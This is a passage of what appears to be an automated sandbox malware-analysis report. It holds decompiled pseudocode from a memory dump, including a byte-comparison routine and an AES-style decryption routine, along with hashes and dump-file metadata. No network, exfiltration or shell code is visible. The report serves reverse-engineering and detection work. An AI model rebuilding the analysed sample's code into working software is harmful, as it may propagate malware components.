																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E00A00E40( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E009F47DA(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E009FEA80(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}










































                            0x009f6277
                            0x009f6279
                            0x009f6287
                            0x009f628f
                            0x009f6293
                            0x009f6295
                            0x009f6297
                            0x009f6297
                            0x009f629a
                            0x009f62a0
                            0x009f62a1
                            0x009f62a6
                            0x009f62b0
                            0x009f6297
                            0x009f62bf
                            0x009f62cf
                            0x009f62d8
                            0x009f62df
                            0x009f62e2
                            0x009f62e4
                            0x009f62e8
                            0x009f62ea
                            0x009f62ee
                            0x009f62f2
                            0x009f62f6
                            0x009f62f6
                            0x009f6302
                            0x009f6308
                            0x009f6309
                            0x009f630e
                            0x009f6314
                            0x00000000
                            0x00000000
                            0x009f631a
                            0x009f631c
                            0x009f6320
                            0x009f6328
                            0x00000000
                            0x009f632e
                            0x009f6334
                            0x00000000
                            0x009f658a
                            0x009f633e
                            0x009f6340
                            0x009f6344
                            0x009f6348
                            0x009f6348
                            0x009f634a
                            0x009f6350
                            0x009f6354
                            0x009f6354
                            0x009f6356
                            0x009f6359
                            0x009f635b
                            0x009f635f
                            0x009f6366
                            0x009f6368
                            0x009f637b
                            0x009f6380
                            0x009f6388
                            0x009f638b
                            0x009f638b
                            0x009f638f
                            0x009f6392
                            0x009f6398
                            0x009f639e
                            0x009f63a4
                            0x009f63a7
                            0x009f63aa
                            0x00000000
                            0x009f63aa
                            0x009f636a
                            0x009f636a
                            0x009f63ae
                            0x009f63ae
                            0x009f63b3
                            0x009f63bd
                            0x009f63c3
                            0x009f63c7
                            0x009f63cd
                            0x009f6400
                            0x009f6400
                            0x009f6405
                            0x009f6416
                            0x009f6416
                            0x009f641d
                            0x009f6407
                            0x009f6407
                            0x009f640e
                            0x00000000
                            0x009f6410
                            0x009f6410
                            0x009f6410
                            0x009f640e
                            0x009f6425
                            0x009f6432
                            0x009f6434
                            0x009f6437
                            0x009f643b
                            0x009f643b
                            0x009f643d
                            0x009f6441
                            0x009f6449
                            0x009f6449
                            0x009f644e
                            0x00000000
                            0x00000000
                            0x009f6443
                            0x009f6443
                            0x009f6447
                            0x00000000
                            0x00000000
                            0x009f6447
                            0x009f63cf
                            0x009f63d2
                            0x009f63d6
                            0x009f63dc
                            0x009f63dd
                            0x009f63e2
                            0x009f63e4
                            0x009f645f
                            0x009f645f
                            0x009f63e6
                            0x009f63e6
                            0x009f63ea
                            0x009f63f5
                            0x009f63f5
                            0x009f63f9
                            0x00000000
                            0x009f63ec
                            0x009f63ec
                            0x009f63f3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f63f3
                            0x009f63ea
                            0x009f63e4
                            0x009f63cd
                            0x00000000
                            0x009f6450
                            0x009f6453
                            0x009f6455
                            0x009f6455
                            0x009f645d
                            0x009f6464
                            0x009f6464
                            0x009f646a
                            0x009f646f
                            0x009f6471
                            0x009f6473
                            0x009f6475
                            0x009f6475
                            0x009f6475
                            0x009f6476
                            0x009f6478
                            0x009f647a
                            0x009f647c
                            0x009f647e
                            0x009f6482
                            0x009f6482
                            0x009f6488
                            0x009f648c
                            0x009f6490
                            0x009f6494
                            0x009f6496
                            0x009f6499
                            0x009f649b
                            0x009f649e
                            0x009f64a0
                            0x009f64a2
                            0x009f64a4
                            0x009f64a4
                            0x009f64a6
                            0x009f64ab
                            0x009f64ae
                            0x009f64c3
                            0x009f64b0
                            0x009f64b3
                            0x009f64b3
                            0x009f64cc
                            0x009f64ce
                            0x009f64d2
                            0x009f64d6
                            0x009f64d6
                            0x009f64dc
                            0x009f64dc
                            0x009f64e0
                            0x009f64e4
                            0x009f64e6
                            0x009f6641
                            0x00000000
                            0x009f64ec
                            0x009f64ef
                            0x009f64f6
                            0x009f64fa
                            0x009f64fc
                            0x009f6568
                            0x009f6568
                            0x00000000
                            0x009f64fe
                            0x009f64fe
                            0x009f64fe
                            0x009f6500
                            0x009f6503
                            0x009f6505
                            0x009f650c
                            0x009f6527
                            0x009f652a
                            0x009f652f
                            0x009f6531
                            0x00000000
                            0x00000000
                            0x009f650e
                            0x009f6511
                            0x009f6516
                            0x009f6518
                            0x009f651e
                            0x009f6525
                            0x009f6537
                            0x009f6537
                            0x009f653e
                            0x009f6544
                            0x009f654b
                            0x009f65a2
                            0x009f65a7
                            0x009f65aa
                            0x009f65ac
                            0x009f65b2
                            0x009f65b9
                            0x009f65bd
                            0x009f65c5
                            0x009f65cb
                            0x009f65ce
                            0x009f65d2
                            0x009f65d9
                            0x009f65dd
                            0x009f65e4
                            0x009f65e6
                            0x009f65e8
                            0x009f65fe
                            0x009f6606
                            0x009f660f
                            0x009f6613
                            0x009f6619
                            0x00000000
                            0x009f6619
                            0x00000000
                            0x009f65e6
                            0x009f654d
                            0x009f654d
                            0x009f6551
                            0x009f6597
                            0x009f6599
                            0x009f656c
                            0x009f656c
                            0x009f656e
                            0x009f6574
                            0x009f6578
                            0x009f657a
                            0x009f6580
                            0x009f662b
                            0x009f662d
                            0x009f662f
                            0x009f6623
                            0x009f6623
                            0x009f6625
                            0x009f6645
                            0x009f6645
                            0x009f664a
                            0x00000000
                            0x00000000
                            0x009f6631
                            0x009f663a
                            0x009f6620
                            0x009f6620
                            0x00000000
                            0x009f6620
                            0x009f662f
                            0x009f6586
                            0x009f6586
                            0x00000000
                            0x009f6586
                            0x009f6580
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6551
                            0x009f654b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6525
                            0x009f6518
                            0x00000000
                            0x009f6553
                            0x009f6557
                            0x009f655d
                            0x009f655e
                            0x009f6562
                            0x009f6562
                            0x00000000
                            0x009f6500
                            0x009f64fc
                            0x00000000
                            0x009f64e6
                            0x009f6592
                            0x00000000
                            0x009f6334
                            0x009f6328
                            0x00000000
                            0x009f6320
                            0x009f6650
                            0x009f6658
                            0x009f665b
                            0x009f6660
                            0x009f666e
                            0x009f6673
                            0x009f6681
                            0x009f669f

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 0f835b5abd6a6481f52e5f54b2544a7c1e6cc4684d2adebed5ef85725564f6ae
                            • Instruction ID: 4a8da222d313b5edc8556e2bda68481a5e4ee79d5c53056480a3f4fa9f94bdcb
                            • Opcode Fuzzy Hash: 0f835b5abd6a6481f52e5f54b2544a7c1e6cc4684d2adebed5ef85725564f6ae
                            • Instruction Fuzzy Hash: 1AD115B1A043498FDB14DF28C8857BBBBE4BF95308F04056DEA84DB642D734E958CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FF8C6, Relevance: .3, Instructions: 323COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FF8C6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                            0x009ff8c6
                            0x009ff8c6
                            0x009ff8c6
                            0x009ff8cc
                            0x009ff953
                            0x009ff955
                            0x009ff957
                            0x009ffcd6
                            0x009ffcd6
                            0x00a00ac7
                            0x00a00ac7
                            0x009ff95d
                            0x009ff963
                            0x009ff9ea
                            0x009ff9ec
                            0x009ff9ee
                            0x00000000
                            0x00000000
                            0x009ff9f4
                            0x009ff9fa
                            0x009ffa81
                            0x009ffa83
                            0x009ffa85
                            0x00000000
                            0x00000000
                            0x009ffa8b
                            0x009ffa91
                            0x009ffb18
                            0x009ffb1a
                            0x009ffb1c
                            0x00000000
                            0x00000000
                            0x009ffb28
                            0x009ffbb0
                            0x009ffbb2
                            0x009ffbb4
                            0x00000000
                            0x00000000
                            0x009ffbba
                            0x009ffbc0
                            0x009ffc47
                            0x009ffc49
                            0x009ffc4b
                            0x00000000
                            0x00000000
                            0x009ffc51
                            0x009ffc57
                            0x009ffcce
                            0x009ffcd0
                            0x009ffcd2
                            0x009ffcd4
                            0x009ffcd4
                            0x00000000
                            0x009ffcd2
                            0x009ffc60
                            0x009ffc62
                            0x009ffc76
                            0x009ffc7e
                            0x009ffc80
                            0x009ffc94
                            0x009ffc9c
                            0x009ffc9e
                            0x009ffcb2
                            0x009ffcba
                            0x009ffcbc
                            0x009ffcc5
                            0x009ffcc5
                            0x00000000
                            0x009ffcbc
                            0x009ffca7
                            0x009ffcb0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffcb0
                            0x009ffc89
                            0x009ffc92
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffc92
                            0x009ffc6b
                            0x009ffc74
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffc74
                            0x009ffbcd
                            0x009ffbcf
                            0x009ffbe7
                            0x009ffbef
                            0x009ffbf1
                            0x009ffc09
                            0x009ffc11
                            0x009ffc13
                            0x009ffc2b
                            0x009ffc33
                            0x009ffc35
                            0x009ffc3e
                            0x009ffc3e
                            0x00000000
                            0x009ffc35
                            0x009ffc1c
                            0x009ffc25
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffc25
                            0x009ffbfa
                            0x009ffc03
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffc03
                            0x009ffbd8
                            0x009ffbe1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffbe1
                            0x009ffb36
                            0x009ffb38
                            0x009ffb50
                            0x009ffb58
                            0x009ffb5a
                            0x009ffb72
                            0x009ffb7a
                            0x009ffb7c
                            0x009ffb94
                            0x009ffb9c
                            0x009ffb9e
                            0x009ffba7
                            0x009ffba7
                            0x00000000
                            0x009ffb9e
                            0x009ffb85
                            0x009ffb8e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffb8e
                            0x009ffb63
                            0x009ffb6c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffb6c
                            0x009ffb41
                            0x009ffb4a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffb4a
                            0x009ffa9e
                            0x009ffaa0
                            0x009ffab8
                            0x009ffac0
                            0x009ffac2
                            0x009ffada
                            0x009ffae2
                            0x009ffae4
                            0x009ffafc
                            0x009ffb04
                            0x009ffb06
                            0x009ffb0f
                            0x009ffb0f
                            0x00000000
                            0x009ffb06
                            0x009ffaed
                            0x009ffaf6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffaf6
                            0x009ffacb
                            0x009ffad4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffad4
                            0x009ffaa9
                            0x009ffab2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffab2
                            0x009ffa07
                            0x009ffa09
                            0x009ffa21
                            0x009ffa29
                            0x009ffa2b
                            0x009ffa43
                            0x009ffa4b
                            0x009ffa4d
                            0x009ffa65
                            0x009ffa6d
                            0x009ffa6f
                            0x009ffa78
                            0x009ffa78
                            0x00000000
                            0x009ffa6f
                            0x009ffa56
                            0x009ffa5f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffa5f
                            0x009ffa34
                            0x009ffa3d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffa3d
                            0x009ffa12
                            0x009ffa1b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ffa1b
                            0x009ff970
                            0x009ff972
                            0x009ff98a
                            0x009ff992
                            0x009ff994
                            0x009ff9ac
                            0x009ff9b4
                            0x009ff9b6
                            0x009ff9ce
                            0x009ff9d6
                            0x009ff9d8
                            0x009ff9e1
                            0x009ff9e1
                            0x00000000
                            0x009ff9d8
                            0x009ff9bf
                            0x009ff9c8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ff9c8
                            0x009ff99d
                            0x009ff9a6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ff9a6
                            0x009ff97b
                            0x009ff984
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ff984
                            0x009ff8d9
                            0x009ff8db
                            0x009ff8f3
                            0x009ff8fb
                            0x009ff8fd
                            0x009ff915
                            0x009ff91d
                            0x009ff91f
                            0x009ff937
                            0x009ff93f
                            0x009ff941
                            0x009ff94a
                            0x009ff94a
                            0x00000000
                            0x009ff941
                            0x009ff928
                            0x009ff931
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ff931
                            0x009ff906
                            0x009ff90f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ff90f
                            0x009ff8e4
                            0x009ff8ed
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction ID: 5d3a7fb6a7bd6591ad8037c2e6287af957fd8250d11a4d9aa7b2b657030a6667
                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction Fuzzy Hash: 8EC193722051AB0ADF2D463AC53413EBAA56EA27B131A07BDD9F3CB5C4FE60C564D720
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EDF12, Relevance: .3, Instructions: 318COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009EDF12(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				signed int _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x64);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x64) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
						E009FEA80(_t431 + 0x54, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E009FEA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
						}
						_t399 =  *(_t432 + 0x60);
						 *(_t432 + 0x1c) = _t399 + 8;
						_t229 =  *(_t432 + 0x70);
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x20) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
							E009EDEDF(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x44);
							 *(_t432 + 0x68) =  *(0xa25350 + (_t402 & 0x000000ff) * 4) ^  *(0xa25f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0xa25b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x50);
							_t363 =  *(_t432 + 0x68) ^  *(0xa25750 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x68) = _t363;
							 *(_t432 + 0x34) = _t363;
							_t403 =  *(_t432 + 0x48);
							_t368 =  *(0xa25750 + (_t402 & 0x000000ff) * 4) ^  *(0xa25350 + (_t403 & 0x000000ff) * 4) ^  *(0xa25f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0xa25b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							 *(_t432 + 0x70) = _t368;
							 *(_t432 + 0x38) = _t368;
							_t404 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0xa25b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0xa25750 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x10) ^  *(0xa25350 + (_t404 & 0x000000ff) * 4) ^  *(0xa25f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t372;
							 *(_t432 + 0x3c) = _t372;
							 *(_t432 + 0x14) =  *(0xa25f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0xa25b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x14) ^  *(0xa25750 + (_t404 & 0x000000ff) * 4) ^  *(0xa25350 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x14) = _t376;
							 *(_t432 + 0x40) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x68);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x14) = _t309;
							_t430 = _t309;
							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x10);
								 *(_t432 + 0x14) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x70);
								_t416 =  *(0xa25750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa25b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa25f50 + (_t356 >> 0x18) * 4) ^  *(0xa25350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
								 *(_t432 + 0x34) = _t416;
								 *(_t432 + 0x70) =  *(0xa25b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa25f50 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x70) ^  *(0xa25750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa25350 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x70) = _t388;
								 *(_t432 + 0x38) = _t388;
								_t394 =  *(0xa25f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0xa25750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa25b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa25350 + (_t412 & 0x000000ff) * 4);
